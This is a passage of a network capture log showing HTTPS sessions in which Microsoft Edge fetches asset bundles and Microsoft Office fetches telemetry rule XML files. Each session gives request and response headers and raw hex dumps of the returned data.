126	192.168.2.5	49901	13.107.246.45	443	7200	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:44 UTC	711	OUT	GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: EntityExtractionDomainsConfig Sec-Mesh-Client-Edge-Version: 117.0.2045.47 Sec-Mesh-Client-Edge-Channel: stable Sec-Mesh-Client-OS: Windows Sec-Mesh-Client-OS-Version: 10.0.19045 Sec-Mesh-Client-Arch: x86_64 Sec-Mesh-Client-WebView: 0 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-13 19:39:45 UTC	576	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:44 GMT Content-Type: application/octet-stream Content-Length: 70207 Connection: close Content-Encoding: gzip Last-Modified: Thu, 07 Nov 2024 20:03:34 GMT ETag: 0x8DCFF6742E8F24C x-ms-request-id: 65809377-801e-001b-2ad1-354695000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241113T193944Z-r178fb8d765jv86hhC1DFW8pt000000001hg000000006qnr Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-13 19:39:45 UTC	15808	IN	Data Raw: 1f 8b 08 08 16 1d 2d 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7 Data Ascii: -gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
2024-11-13 19:39:45 UTC	16384	IN	Data Raw: c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97 Data Ascii: qb,0Rte\|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;\|a``\|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:
2024-11-13 19:39:45 UTC	16384	IN	Data Raw: c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b Data Ascii: Rg\|M kt\|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX$Nkct&iZ%b8Zoj@ u2OgA1DG35d*lg\|9GV>OVzVMPA76.\|crkX
2024-11-13 19:39:45 UTC	16384	IN	Data Raw: 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc Data Ascii: AHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;
2024-11-13 19:39:45 UTC	5247	IN	Data Raw: 9a 2a 83 ab 27 93 58 c5 2b d2 9c af 2b 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 cf 54 85 de 92 34 2e Data Ascii: *'X++NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt\|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDYT4.

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.5	49902	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:44 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:44 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:44 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: a35c742a-a01e-000d-06a1-34d1ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193944Z-r178fb8d765hbcjvhC1DFW50zc00000001cg00000000vkz7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:44 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.5	49903	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:44 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:45 UTC	538	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:44 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 157887d5-b01e-0084-44d2-2cd736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193944Z-16547b76f7f7jnp2hC1DFWfc300000000hqg0000000052c0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:45 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	49904	13.107.246.45	443	7200	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:45 UTC	470	OUT	GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: Shoreline Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-13 19:39:45 UTC	584	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:45 GMT Content-Type: application/octet-stream Content-Length: 306698 Connection: close Content-Encoding: gzip Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT ETag: 0x8DBC9B5C40EBFF4 x-ms-request-id: 94bdde0a-901e-0004-24a7-359d85000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241113T193945Z-r178fb8d765jv86hhC1DFW8pt000000001k0000000004tz4 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-13 19:39:45 UTC	15800	IN	Data Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&\|'J'~eL\|&c~6{JAw^z3cUEeMaTu W/^~b\|X_?r~vXwW
2024-11-13 19:39:45 UTC	16384	IN	Data Raw: a5 38 7d a8 02 c7 0a 04 ba b8 75 26 ce 55 c2 08 bf 5c 90 e7 68 0d 8c 7c 07 bb 14 ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 Data Ascii: 8}u&U\h\|[T[%6Q+"PR6mU5YgV-HoB /!~qL\|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz\|PVM&UOu~{-oM5Qa
2024-11-13 19:39:45 UTC	16384	IN	Data Raw: 56 c6 75 11 82 12 e0 b7 2c 9c d4 28 cd 82 09 ad 54 24 d2 ae 26 b9 4f 37 c4 67 1e 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 Data Ascii: Vu,(T$&O7gkD$>U\|}mlBxz*BFSzP~\|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)\|[U35Q
2024-11-13 19:39:45 UTC	16384	IN	Data Raw: 15 3e 36 a4 6a 67 7e 2a 42 7f 7e 14 be 1b ef d2 39 b9 d3 a0 0f a6 db fd c0 cf 6a 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 Data Ascii: >6jg~B~9jsg9P3[=[b'1\%}~i?2tmA@0!0VC\:_Gp`n3.e_j;`?ihbE}Z_"]ya8/b</8iEC>niM]z_]y]DZgtc>qDX\\M
2024-11-13 19:39:45 UTC	16384	IN	Data Raw: e5 2e b7 93 a4 b3 90 c2 6b ad 8a 70 f5 34 6b b8 40 3f ab 6c ff 6b b9 2f c1 49 79 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 Data Ascii: .kp4k@?lk/IyMR\!1Q\|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0oj~~{Y1U}n\|?4>tk,OS]\|w}:)y7gg3r#YU]oU~C
2024-11-13 19:39:45 UTC	16384	IN	Data Raw: df 26 b7 09 e8 f5 8c 1d c0 e5 f5 0e 81 86 cd d1 7b 9c 8b 16 07 4d 31 65 8e 49 77 c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c Data Ascii: &{M1eIwyfr;Tt5S};PtEr~uVOLC=A{5__ptHt\|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l
2024-11-13 19:39:46 UTC	16384	IN	Data Raw: c0 77 d7 f0 0b 75 ef b4 4f 20 01 c9 6e d7 8b d6 eb 26 ee 09 6d 06 c3 c0 20 42 f6 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e Data Ascii: wuO n&m Bb.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^\|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>
2024-11-13 19:39:46 UTC	16384	IN	Data Raw: 8f 67 d5 e8 e4 34 eb e6 2c b7 a9 5c 69 a3 75 af d9 ba f6 11 ea 58 64 70 1a 03 5a 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 Data Ascii: g4,\iuXdpZu\m}v0d'R}g]]OZ&z+gK[\|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{O
2024-11-13 19:39:46 UTC	16384	IN	Data Raw: c8 b1 0e c3 45 a4 cf 34 82 9b a9 e1 c3 b1 e1 46 87 99 95 55 9a b4 be 3b 59 b1 6b f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 Data Ascii: E4FU;YkJj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;\|.'Ocl7vUh&n{G]%vH
